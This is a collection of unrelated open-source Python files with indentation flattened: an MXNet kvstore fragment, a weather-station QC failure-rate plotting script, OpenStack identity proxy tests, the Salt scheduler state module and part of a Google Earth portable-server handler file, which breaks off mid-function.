`init` the values and then have all the workers `pull` the initialized value.
Before pulling, we can invoke ``_barrier()`` to guarantee that the
initialization is finished.
"""
check_call(_LIB.MXKVStoreBarrier(self.handle))
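# A minimal sketch of the pattern described above (hedged; hypothetical names,
# assumes a distributed kvstore "kv"):
#
#   kv.init('weight', mx.nd.zeros((2, 2)))   # only rank 0's value is kept
#   kv._barrier()                            # wait until init has finished
#   kv.pull('weight', out=local_weight)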
def _send_command_to_servers(self, head, body):
"""Sends a command to all server nodes.
Sending command to a server node will cause that server node to invoke
``KVStoreServer.controller`` to execute the command.
This function returns after the command has been executed on all server
nodes.
Parameters
----------
head : int
the head of the command.
body : str
the body of the command.
"""
check_call(_LIB.MXKVStoreSendCommmandToServers(
self.handle, mx_uint(head), c_str(body)))
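# --- Illustrative sketch, not part of the MXNet implementation ---------------
# The 2bit compression described in ``KVStore.set_gradient_compression`` can be
# pictured with plain NumPy: values above ``threshold`` are clipped to
# +threshold, values below -threshold to -threshold, everything else to 0, and
# the clipping error is kept as a residual that is added back before the next
# round. All names below are hypothetical.
def _two_bit_compression_sketch(gradient, residual, threshold=0.5):
    """Return (quantized, new_residual) for one compression round."""
    import numpy as np
    corrected = gradient + residual           # add residual from the last round
    quantized = np.zeros_like(corrected)
    quantized[corrected > threshold] = threshold
    quantized[corrected < -threshold] = -threshold
    new_residual = corrected - quantized      # error kept at the sender's end
    return quantized, new_residual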
|
|
#!/usr/local/sci/bin/python
#*****************************
#
# plot failure rate for each test and overall for variables
#
#
#************************************************************************
# SVN Info
#$Rev:: 120 $: Revision of last commit
#$Author:: rdunn $: Author of last commit
#$Date:: 2017-02-24 10:34:07 +0000 (Fri, 24 Feb 2017) $: Date of last commit
#************************************************************************
import numpy as np
import datetime as dt
import os
import sys
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
# RJHD utils
import qc_utils as utils
import netcdf_procs as ncdfp
from set_paths_and_vars import *
#*******************************************************
qc_test=['DUP','TFV','DFV','SFV','DNL','TGP','DGP','SGP','TRC','DRC',\
'WRC','PRC','TSS','DSS','WSS','PSS','HTS','HDS','HWS','HPS',\
'DTS','DDS','DWS','DPS','TCM','DCM','PCM','TSP','DSP','PSP','WSP'\
'SSS','DPD','DCF','CUOT','CUOL','CUOM','CUOH','CST','FLW','FMC',\
'NGC','TOT','DOT','SOT','TMB','DMB','SMB','WMB','BBB','CMB',\
'LMB','MMB','HMB','BMB','OCT','OCD','OCW','OCS','TVR','DVR',\
'SVR','WVR','WSL','WDL','WRS','STR_T','STR_D','STR_w','STR_S','ALL_T','ALL_Td','ALL_SLP','ALL_W','ACL']
# list of tests not the same as where they were applied to!
T_QC=[0,1,4,5,8,12,16,20,24,27,41,44,54,58]
D_QC=[0,2,4,6,8,9,13,17,21,25,28,30,31,32,42,45,55,59]
S_QC=[0,3,4,7,11,15,19,23,26,29,43,46,57,60] # 26 should be empty
WS_QC=[0,10,14,18,22,47,56,61,62,63,64,65]
WD_QC=[0,10,14,18,22,47,48,56,61,62,63,64,65,66,67,68]
C_QC=range(33,41)
strT_QC=[12,16,20]
strD_QC=[13,17,21]
strWS_QC=[14,18,22]
strWD_QC=[66,67,68]
strS_QC=[15,19,23]
station_list = "candidate_stations.txt"
process_vars = ["temperatures","dewpoints","slp","windspeeds","winddirs","total_cloud_cover"]
diagnostics = False
start_time_string = dt.datetime.strftime(dt.datetime.now(), "%Y%m%d")
try:
station_info = np.genfromtxt(os.path.join(INPUT_FILE_LOCS, station_list), dtype=(str))
except IOError:
print "station list not found"
sys.exit()
all_flag_sums = np.zeros([len(station_info), len(qc_test)+6])
all_flag_pct = np.zeros([len(station_info), len(qc_test)])
Lons = []
Lats = []
uk_stns = []
for st,stat in enumerate(station_info):
# set up station
station = utils.Station(stat[0], float(stat[1]), float(stat[2]), float(stat[3]))
# if station.id[:2] != "03":
# continue
print st, station.id
# read attributes and qc_flags
ncdfp.read(os.path.join(NETCDF_DATA_LOCS, station.id + "_mask.nc"), station, process_vars, [], diagnostics = diagnostics)
# sum qc_flags:
# remove multi-level flagging
qc_flags = station.qc_flags[:]
qc_flags[qc_flags[:] > 1] = 1
# remove multi-level flagging - neighbour flags
no_neighbours = qc_flags[qc_flags[:] == -1].size
qc_flags[qc_flags[:] < 0] = 0
total_flags = qc_flags[qc_flags[:] != 0].size
sum_flags = np.sum(qc_flags[:], axis = 0) # 61 column array
for cols in [strT_QC, strD_QC, strWS_QC, strWD_QC, strS_QC, T_QC, D_QC, S_QC, WS_QC, WD_QC, C_QC]:
sum_flags = np.append(sum_flags, np.sum(sum_flags[cols]))
all_flag_sums[st] = sum_flags
# now do percentage flagged of total obs
pct_flag = np.zeros(len(qc_test), dtype = float)
for t,test in enumerate(qc_test):
if t in T_QC:
if station.temperatures.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.temperatures.data.compressed().size
elif t in D_QC:
if station.dewpoints.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.dewpoints.data.compressed().size
elif t in S_QC:
if station.slp.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.slp.data.compressed().size
elif t in WS_QC:
if station.windspeeds.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.windspeeds.data.compressed().size
elif t in WD_QC:
if station.winddirs.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.winddirs.data.compressed().size
elif t in C_QC:
if station.total_cloud_cover.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.total_cloud_cover.data.size
else:
if station.temperatures.data.compressed().size > 0:
pct_flag[t] = sum_flags[t] / station.temperatures.data.size
all_flag_pct[st] = 100. * pct_flag
# get occasions when more locations are flagged than have data.
over_100, = np.where(all_flag_pct[st] > 100.)
all_flag_pct[st][over_100] = 100.
Lons += [station.lon]
Lats += [station.lat]
uk_stns += [st]
Lats = np.array(Lats)
Lons = np.array(Lons)
outfile = file(INPUT_FILE_LOCS+"all_fails_summary_{}.dat".format(start_time_string),'w')
for t,test in enumerate(qc_test):
plt.figure(figsize=(8,6))
plt.clf()
ax = plt.axes([0,0,1,1],projection = ccrs.Robinson())
ax.set_global()
ax.coastlines('50m')
try:
ax.gridlines(draw_labels = True)
except TypeError:
ax.gridlines()
# colors are the exact same RGB codes as in IDL
colors = [(150,150,150),(41,10,216),(63,160,255),(170,247,255),(255,224,153),(247,109,94),(165,0,33),(0,0,0)]
limits = [0.0, 0.1, 0.2, 0.5, 1.0, 2.0, 5.0, 100.]
all_locs = []
for u, upper in enumerate(limits):
if u == 0:
locs, = np.where(all_flag_pct[uk_stns,t] == 0)
label = "{}%: {}".format(upper, len(locs))
else:
locs, = np.where(np.logical_and(all_flag_pct[uk_stns,t] <= upper, all_flag_pct[uk_stns,t] > limits[u-1]))
label = ">{} to {}%: {}".format(limits[u-1], upper, len(locs))
if upper == limits[-1]:
label = ">{}%: {}".format(limits[u-1], len(locs))
if len(locs) > 0:
ax.scatter(Lons[locs], Lats[locs], transform = ccrs.Geodetic(), s = 15, c = tuple([float(c)/255 for c in colors[u]]), edgecolors="none", label = label)
else:
ax.scatter([0], [-90], transform = ccrs.Geodetic(), s = 15, c = tuple([float(c)/255 for c in colors[u]]), edgecolors="none", label = label)
all_locs += [len(locs)]
if test != "ALL_SLP":
plt.title(" ".join([s.capitalize() for s in test.split("_")]))
else:
plt.title("All SLP")
watermarkstring="/".join(os.getcwd().split('/')[4:])+'/'+os.path.basename( __file__ )+" "+dt.datetime.strftime(dt.datetime.now(), "%d-%b-%Y %H:%M")
plt.figtext(0.01,0.01,watermarkstring,size=5)
leg=plt.legend(loc='lower center',ncol=4, bbox_to_anchor = (0.5,-0.2), frameon=False, title='',prop={'size':11},labelspacing=0.15,columnspacing=0.5, numpoints=1)
plt.savefig(IMAGE_LOCS+"All_fails_{}_{}.png".format(test, start_time_string))
plt.close()
outfile.write("{:10s}".format(test)+''.join(['%7i' % n for n in all_locs])+''.join(["%7.1f" % n for n in [100.*n/len(Lats) for n in all_locs]])+"\n")
outfile.close()
#*******************************************************
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack.identity.v3 import _proxy
from openstack.identity.v3 import credential
from openstack.identity.v3 import domain
from openstack.identity.v3 import endpoint
from openstack.identity.v3 import group
from openstack.identity.v3 import policy
from openstack.identity.v3 import project
from openstack.identity.v3 import region
from openstack.identity.v3 import role
from openstack.identity.v3 import service
from openstack.identity.v3 import trust
from openstack.identity.v3 import user
from openstack.tests.unit import test_proxy_base2
class TestIdentityProxy(test_proxy_base2.TestProxyBase):
def setUp(self):
super(TestIdentityProxy, self).setUp()
self.proxy = _proxy.Proxy(self.session)
def test_credential_create_attrs(self):
self.verify_create(self.proxy.create_credential,
credential.Credential)
def test_credential_delete(self):
self.verify_delete(self.proxy.delete_credential,
credential.Credential, False)
def test_credential_delete_ignore(self):
self.verify_delete(self.proxy.delete_credential,
credential.Credential, True)
def test_credential_find(self):
self.verify_find(self.proxy.find_credential, credential.Credential)
def test_credential_get(self):
self.verify_get(self.proxy.get_credential, credential.Credential)
def test_credentials(self):
self.verify_list(self.proxy.credentials, credential.Credential,
paginated=False)
def test_credential_update(self):
self.verify_update(self.proxy.update_credential, credential.Credential)
def test_domain_create_attrs(self):
self.verify_create(self.proxy.create_domain, domain.Domain)
def test_domain_delete(self):
self.verify_delete(self.proxy.delete_domain, domain.Domain, False)
def test_domain_delete_ignore(self):
self.verify_delete(self.proxy.delete_domain, domain.Domain, True)
def test_domain_find(self):
self.verify_find(self.proxy.find_domain, domain.Domain)
def test_domain_get(self):
self.verify_get(self.proxy.get_domain, domain.Domain)
def test_domains(self):
self.verify_list(self.proxy.domains, domain.Domain, paginated=False)
def test_domain_update(self):
self.verify_update(self.proxy.update_domain, domain.Domain)
def test_endpoint_create_attrs(self):
self.verify_create(self.proxy.create_endpoint, endpoint.Endpoint)
def test_endpoint_delete(self):
self.verify_delete(self.proxy.delete_endpoint,
endpoint.Endpoint, False)
def test_endpoint_delete_ignore(self):
self.verify_delete(self.proxy.delete_endpoint,
endpoint.Endpoint, True)
def test_endpoint_find(self):
self.verify_find(self.proxy.find_endpoint, endpoint.Endpoint)
def test_endpoint_get(self):
self.verify_get(self.proxy.get_endpoint, endpoint.Endpoint)
def test_endpoints(self):
self.verify_list(self.proxy.endpoints, endpoint.Endpoint,
paginated=False)
def test_endpoint_update(self):
self.verify_update(self.proxy.update_endpoint, endpoint.Endpoint)
def test_group_create_attrs(self):
self.verify_create(self.proxy.create_group, group.Group)
def test_group_delete(self):
self.verify_delete(self.proxy.delete_group, group.Group, False)
def test_group_delete_ignore(self):
self.verify_delete(self.proxy.delete_group, group.Group, True)
def test_group_find(self):
self.verify_find(self.proxy.find_group, group.Group)
def test_group_get(self):
self.verify_get(self.proxy.get_group, group.Group)
def test_groups(self):
self.verify_list(self.proxy.groups, group.Group, paginated=False)
def test_group_update(self):
self.verify_update(self.proxy.update_group, group.Group)
def test_policy_create_attrs(self):
self.verify_create(self.proxy.create_policy, policy.Policy)
def test_policy_delete(self):
self.verify_delete(self.proxy.delete_policy, policy.Policy, False)
def test_policy_delete_ignore(self):
self.verify_delete(self.proxy.delete_policy, policy.Policy, True)
def test_policy_find(self):
self.verify_find(self.proxy.find_policy, policy.Policy)
def test_policy_get(self):
self.verify_get(self.proxy.get_policy, policy.Policy)
def test_policies(self):
self.verify_list(self.proxy.policies, policy.Policy, paginated=False)
def test_policy_update(self):
self.verify_update(self.proxy.update_policy, policy.Policy)
def test_project_create_attrs(self):
self.verify_create(self.proxy.create_project, project.Project)
def test_project_delete(self):
self.verify_delete(self.proxy.delete_project, project.Project, False)
def test_project_delete_ignore(self):
self.verify_delete(self.proxy.delete_project, project.Project, True)
def test_project_find(self):
self.verify_find(self.proxy.find_project, project.Project)
def test_project_get(self):
self.verify_get(self.proxy.get_project, project.Project)
def test_projects(self):
self.verify_list(self.proxy.projects, project.Project, paginated=False)
def test_project_update(self):
self.verify_update(self.proxy.update_project, project.Project)
def test_service_create_attrs(self):
self.verify_create(self.proxy.create_service, service.Service)
def test_service_delete(self):
self.verify_delete(self.proxy.delete_service, service.Service, False)
def test_service_delete_ignore(self):
self.verify_delete(self.proxy.delete_service, service.Service, True)
def test_service_find(self):
self.verify_find(self.proxy.find_service, service.Service)
def test_service_get(self):
self.verify_get(self.proxy.get_service, service.Service)
def test_services(self):
self.verify_list(self.proxy.services, service.Service, paginated=False)
def test_service_update(self):
self.verify_update(self.proxy.update_service, service.Service)
def test_user_create_attrs(self):
self.verify_create(self.proxy.create_user, user.User)
def test_user_delete(self):
self.verify_delete(self.proxy.delete_user, user.User, False)
def test_user_delete_ignore(self):
self.verify_delete(self.proxy.delete_user, user.User, True)
def test_user_find(self):
self.verify_find(self.proxy.find_user, user.User)
def test_user_get(self):
self.verify_get(self.proxy.get_user, user.User)
def test_users(self):
self.verify_list(self.proxy.users, user.User, paginated=False)
def test_user_update(self):
self.verify_update(self.proxy.update_user, user.User)
def test_trust_create_attrs(self):
self.verify_create(self.proxy.create_trust, trust.Trust)
def test_trust_delete(self):
self.verify_delete(self.proxy.delete_trust, trust.Trust, False)
def test_trust_delete_ignore(self):
self.verify_delete(self.proxy.delete_trust, trust.Trust, True)
def test_trust_find(self):
self.verify_find(self.proxy.find_trust, trust.Trust)
def test_trust_get(self):
self.verify_get(self.proxy.get_trust, trust.Trust)
def test_trusts(self):
self.verify_list(self.proxy.trusts, trust.Trust, paginated=False)
def test_region_create_attrs(self):
self.verify_create(self.proxy.create_region, region.Region)
def test_region_delete(self):
self.verify_delete(self.proxy.delete_region, region.Region, False)
def test_region_delete_ignore(self):
self.verify_delete(self.proxy.delete_region, region.Region, True)
def test_region_find(self):
self.verify_find(self.proxy.find_region, region.Region)
def test_region_get(self):
self.verify_get(self.proxy.get_region, region.Region)
def test_regions(self):
self.verify_list(self.proxy.regions, region.Region, paginated=False)
def test_region_update(self):
self.verify_update(self.proxy.update_region, region.Region)
def test_role_create_attrs(self):
self.verify_create(self.proxy.create_role, role.Role)
def test_role_delete(self):
self.verify_delete(self.proxy.delete_role, role.Role, False)
def test_role_delete_ignore(self):
self.verify_delete(self.proxy.delete_role, role.Role, True)
def test_role_find(self):
self.verify_find(self.proxy.find_role, role.Role)
def test_role_get(self):
self.verify_get(self.proxy.get_role, role.Role)
def test_roles(self):
self.verify_list(self.proxy.roles, role.Role, paginated=False)
def test_role_update(self):
self.verify_update(self.proxy.update_role, role.Role)
|
|
"""
Management of the Salt scheduler
==============================================
.. code-block:: yaml
job3:
schedule.present:
- function: test.ping
- seconds: 3600
- splay: 10
This will schedule the command: test.ping every 3600 seconds
(every hour) splaying the time between 0 and 10 seconds
job2:
schedule.present:
- function: test.ping
- seconds: 15
- splay:
start: 10
end: 20
This will schedule the command: test.ping every 15 seconds
splaying the time between 10 and 20 seconds
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- when:
- Monday 5:00pm
- Tuesday 3:00pm
- Wednesday 5:00pm
- Thursday 3:00pm
- Friday 5:00pm
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday. Requires that
python-dateutil is installed on the minion.
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- cron: '*/5 * * * *'
Scheduled jobs can also be specified using the format used by cron. This will
schedule the command: state.sls httpd test=True to run every 5 minutes. Requires
that python-croniter is installed on the minion.
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- when:
- Monday 5:00pm
- Tuesday 3:00pm
- Wednesday 5:00pm
- Thursday 3:00pm
- Friday 5:00pm
- returner: xmpp
- return_config: xmpp_state_run
- return_kwargs:
recipient: [email protected]
This will schedule the command: state.sls httpd test=True at 5pm on Monday,
Wednesday and Friday, and 3pm on Tuesday and Thursday. Using the xmpp returner
to return the results of the scheduled job, with the alternative configuration
options found in the xmpp_state_run section.
job1:
schedule.present:
- function: state.sls
- job_args:
- httpd
- job_kwargs:
test: True
- hours: 1
- skip_during_range:
- start: 2pm
- end: 3pm
- run_after_skip_range: True
This will schedule the command: state.sls httpd test=True every hour, but will
skip any run that falls between 2pm and 3pm and, since run_after_skip_range is
True, run the job as soon as the skip range has ended. Requires that
python-dateutil is installed on the minion.
"""
def present(name, **kwargs):
"""
Ensure a job is present in the schedule
name
The unique name that is given to the scheduled job.
seconds
The scheduled job will be executed after the specified
number of seconds have passed.
minutes
The scheduled job will be executed after the specified
number of minutes have passed.
hours
The scheduled job will be executed after the specified
number of hours have passed.
days
The scheduled job will be executed after the specified
number of days have passed.
when
This will schedule the job at the specified time(s).
The when parameter must be a single value or a dictionary
with the date string(s) using the dateutil format.
Requires python-dateutil.
cron
This will schedule the job at the specified time(s)
using the crontab format.
Requires python-croniter.
run_on_start
Whether the job will run when the Salt minion starts, or the job will be
skipped **once** and run at the next scheduled run. Value should be a
boolean.
function
The function that should be executed by the scheduled job.
job_args
The arguments that will be used by the scheduled job.
job_kwargs
The keyword arguments that will be used by the scheduled job.
maxrunning
Ensure that there are no more than N copies of a particular job running.
jid_include
Include the job into the job cache.
splay
The amount of time in seconds to splay a scheduled job.
Can be specified as a single value in seconds or as a dictionary
range with 'start' and 'end' values.
range
This will schedule the command within the range specified.
The range parameter must be a dictionary with the date strings
using the dateutil format. Requires python-dateutil.
once
This will schedule a job to run once on the specified date.
once_fmt
The default date format is ISO 8601 but can be overridden by
also specifying the ``once_fmt`` option.
enabled
Whether the job should be enabled or disabled. Value should be a boolean.
return_job
Whether to return information to the Salt master upon job completion.
metadata
Using the metadata parameter special values can be associated with
a scheduled job. These values are not used in the execution of the job,
but can be used to search for specific jobs later if combined with the
return_job parameter. The metadata parameter must be specified as a
dictionary, otherwise it will be ignored.
returner
The returner to use to return the results of the scheduled job.
return_config
The alternative configuration to use for returner configuration options.
return_kwargs
Any individual returner configuration items to override. Should be passed
as a dictionary.
persist
Whether the job should persist between minion restarts, defaults to True.
skip_during_range
This will ensure that the scheduled command does not run within the
range specified. The range parameter must be a dictionary with the
date strings using the dateutil format. Requires python-dateutil.
run_after_skip_range
Whether the job should run immediately after the skip_during_range time
period ends.
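    Usage example (an illustrative sketch; the job name, schedule, and state
    are hypothetical):
        job_httpd_test:
          schedule.present:
            - function: state.sls
            - job_args:
              - httpd
            - job_kwargs:
                test: True
            - hours: 1
            - splay: 30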
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
new_item = __salt__["schedule.build_schedule_item"](name, **kwargs)
# See if the new_item is valid
if isinstance(new_item, dict):
if "result" in new_item and not new_item["result"]:
ret["result"] = new_item["result"]
ret["comment"] = new_item["comment"]
return ret
# The schedule.list gives us an item that is guaranteed to have an
# 'enabled' argument. Before comparing, add 'enabled' if it's not
# available (assume True, like schedule.list does)
if "enabled" not in new_item:
new_item["enabled"] = True
if new_item == current_schedule[name]:
ret["comment"].append("Job {} in correct state".format(name))
else:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.modify"](name, **kwargs)
ret["comment"].append(result["comment"])
ret["changes"] = result["changes"]
else:
result = __salt__["schedule.modify"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Modifying job {} in schedule".format(name))
ret["changes"] = result["changes"]
else:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.add"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.add"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Adding new job {} to schedule".format(name))
ret["changes"] = result["changes"]
ret["comment"] = "\n".join(ret["comment"])
return ret
def absent(name, **kwargs):
"""
Ensure a job is absent from the schedule
name
The unique name that is given to the scheduled job.
persist
Whether the job should persist between minion restarts, defaults to True.
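    Usage example (an illustrative sketch; the job name is hypothetical):
        job_httpd_test:
          schedule.absent:
            - persist: True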
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.delete"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.delete"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Removed job {} from schedule".format(name))
ret["changes"] = result["changes"]
else:
ret["comment"].append("Job {} not present in schedule".format(name))
ret["comment"] = "\n".join(ret["comment"])
return ret
def enabled(name, **kwargs):
"""
Ensure a job is enabled in the schedule
name
The unique name that is given to the scheduled job.
persist
Whether the job should persist between minion restarts, defaults to True.
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.enable_job"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.enable_job"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["changes"] = result["changes"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Enabled job {} from schedule".format(name))
else:
ret["comment"].append("Job {} not present in schedule".format(name))
ret["comment"] = "\n".join(ret["comment"])
return ret
def disabled(name, **kwargs):
"""
Ensure a job is disabled in the schedule
name
The unique name that is given to the scheduled job.
persist
Whether the job should persist between minion restarts, defaults to True.
"""
ret = {"name": name, "result": True, "changes": {}, "comment": []}
current_schedule = __salt__["schedule.list"](show_all=True, return_yaml=False)
if name in current_schedule:
if "test" in __opts__ and __opts__["test"]:
kwargs["test"] = True
result = __salt__["schedule.disable_job"](name, **kwargs)
ret["comment"].append(result["comment"])
else:
result = __salt__["schedule.disable_job"](name, **kwargs)
if not result["result"]:
ret["result"] = result["result"]
ret["comment"] = result["comment"]
return ret
else:
ret["comment"].append("Disabled job {} from schedule".format(name))
else:
ret["comment"].append("Job {} not present in schedule".format(name))
ret["comment"] = "\n".join(ret["comment"])
return ret
|
|
#!/usr/bin/env python2.7
#
# Copyright 2017 Google Inc, 2019 Open GEE Contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Serves a specified globe to Google Earth EC.
Google Earth EC can be running on the same machine
or can be accessing this server through a proxy server
sharing the same key.
"""
import tornado.httpserver
import tornado.ioloop
import tornado.web
import local_server
import portable_globe
import portable_server_base
import portable_web_interface
from platform_specific_functions import prepare_for_io_loop
class FlatFileHandler(portable_server_base.BaseHandler):
"""Class for handling flatfile requests."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for packets."""
argument_str = self.request.uri.split("?")[1]
arguments = argument_str.split("-")
if arguments[0] == "lf":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "application/octet-stream")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalFlatFileHandler(
self, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalFlatFileHandler(
self, portable_globe.NON_COMPOSITE_LAYER)
self.finish()
class CompositeFlatFileHandler(portable_server_base.BaseHandler):
"""Class for handling flatfile requests to glc layers."""
@tornado.web.asynchronous
def get(self, layer_id):
"""Handle GET request for packets."""
argument_str = self.request.uri.split("?")[1]
arguments = argument_str.split("-")
if arguments[0] == "lf":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "application/octet-stream")
tornado.web.local_server_.LocalFlatFileHandler(self, int(layer_id))
self.finish()
class DbRootHandler(portable_server_base.BaseHandler):
"""Class for returning the dbRoot."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for the dbroot."""
self.set_header("Content-Type", "application/octet-stream")
if not tornado.web.globe_.Is3d():
print "Bad request: dbRoot from non-3D globe."
else:
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalDbRootHandler(
self, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalDbRootHandler(
self, portable_globe.NON_COMPOSITE_LAYER)
self.finish()
class CompositeDbRootHandler(portable_server_base.BaseHandler):
"""Class for returning the meta dbRoot of a glc or dbRoots of its layers."""
@tornado.web.asynchronous
def get(self, layer_id):
"""Handle GET request for the dbroot."""
self.set_header("Content-Type", "application/octet-stream")
if not tornado.web.globe_.Is3d():
print "Bad request: dbRoot from non-3D globe."
elif not tornado.web.globe_.IsComposite():
print "Bad request: composite request for glb."
else:
tornado.web.local_server_.LocalDbRootHandler(self, int(layer_id))
self.finish()
class CompositeVectorLayerHandler(portable_server_base.BaseHandler):
"""Class for returning vector layer data."""
@tornado.web.asynchronous
def get(self, layer_id, path):
"""Handle GET request for vector layer data."""
path = path.encode("ascii", "ignore")
self.set_header("Content-Type", "text/html")
if not tornado.web.globe_.IsComposite():
print "Bad request: composite request for glb."
else:
tornado.web.local_server_.LocalLayerVectorFileHandler(
self, path, int(layer_id))
self.finish()
class DocsHandler(portable_server_base.BaseHandler):
"""Class for returning the content of files directly from disk."""
@tornado.web.asynchronous
def get(self, path):
"""Handle GET request for some document.
        For example, it is used for JavaScript files needed by
        the Google Earth web browser plugin.
Args:
path: Path to file to be returned.
"""
path = path.encode("ascii", "ignore")
if path[-3:].lower() == "gif":
self.set_header("Content-Type", "image/gif")
elif path[-3:].lower() == "png":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "text/html")
tornado.web.local_server_.LocalDocsHandler(self, path)
self.finish()
class CompositeDocsHandler(portable_server_base.BaseHandler):
"""Class for returning the content of files directly from disk."""
@tornado.web.asynchronous
def get(self, layer_id, path):
"""Handle GET request for some document.
        For example, it is used for JavaScript files needed by
        the Google Earth web browser plugin.
Args:
layer_id: Id of layer within the composite.
path: Path to file to be returned.
"""
path = path.encode("ascii", "ignore")
if path[-3:].lower() == "gif":
self.set_header("Content-Type", "image/gif")
elif path[-3:].lower() == "png":
self.set_header("Content-Type", "image/png")
else:
self.set_header("Content-Type", "text/html")
tornado.web.local_server_.LocalLayerDocsHandler(
self, path, int(layer_id))
self.finish()
class BalloonHandler(portable_server_base.BaseHandler):
"""Class for returning the content for a balloon."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for FT balloon data."""
self.set_header("Content-Type", "text/html")
ftid = self.request.arguments["ftid"][0].replace(":", "-")
path = "earth/vector_layer/balloon_%s.html" % ftid
tornado.web.local_server_.LocalDocsHandler(self, path)
self.finish()
class IconHandler(FlatFileHandler):
"""Class for returning icons."""
@tornado.web.asynchronous
def get(self, icon):
"""Handle GET request for icon."""
icon = icon.encode("ascii", "ignore")
self.set_header("Content-Type", "image/png")
if tornado.web.globe_.IsComposite():
tornado.web.local_server_.LocalIconHandler(
self, icon, portable_globe.COMPOSITE_BASE_LAYER)
else:
tornado.web.local_server_.LocalIconHandler(
self, icon, portable_globe.NON_COMPOSITE_LAYER)
self.finish()
class CompositeIconHandler(FlatFileHandler):
"""Class for returning icons."""
@tornado.web.asynchronous
def get(self, icon, layer_id):
"""Handle GET request for icon."""
icon = icon.encode("ascii", "ignore")
self.set_header("Content-Type", "image/png")
tornado.web.local_server_.LocalIconHandler(self, icon, int(layer_id))
self.finish()
class KmlSearchHandler(portable_server_base.BaseHandler):
"""Class for returning search results as kml."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for kml search results."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalKmlSearchHandler(self)
self.finish()
class JsonSearchHandler(portable_server_base.BaseHandler):
"""Class for returning search results as json."""
@tornado.web.asynchronous
def get(self):
"""Handle GET request for json search results."""
self.set_header("Content-Type", "text/plain")
tornado.web.local_server_.LocalJsonSearchHandler(self)
self.finish()
class CompositeQueryHandler(portable_server_base.BaseHandler):
"""Class for handling "query" requests."""
@tornado.web.asynchronous
def get(self, layer_id):
"""Handle GET request for JSON file for plugin."""
if self.request.arguments["request"][0] == "Json":
self.set_header("Content-Type", "text/plain; charset=utf-8")
if ("is2d" in self.request.arguments.keys() and
self.request.arguments["is2d"][0] == "t"):
tornado.web.local_server_.LocalJsonHandler(self, True)
else:
tornado.web.local_server_.LocalJsonHandler(self, False)
elif self.request.arguments["request"][0] == "ImageryMaps":
if tornado.web.globe_.IsMbtiles():
self.set_header("Content-Type", "image/png")
tornado.web.local_server_.LocalMapTileHandler(
self, True, portable_globe.COMPOSITE_BASE_LAYER)
else:
self.set_header("Content-Type", "image/jpeg")
tornado.web.local_server_.LocalMapTileHandler(
self, True, int(layer_id))
elif self.request.arguments["request"][0] == "VectorMapsRaster":
self.set_header("Content-Type", "image/png")
tornado.web.local_server_.LocalMapTileHandler(
self, False, int(layer_id))
elif self.request.arguments["request"][0] == "Icon":
self.set_header("Content-Type", "image/png")
(icon_path, use_layer, use_local) = (
tornado.web.local_server_.ConvertIconPath(
self.request.arguments["icon_path"][0]))
layer_id = int(layer_id)
if not use_layer:
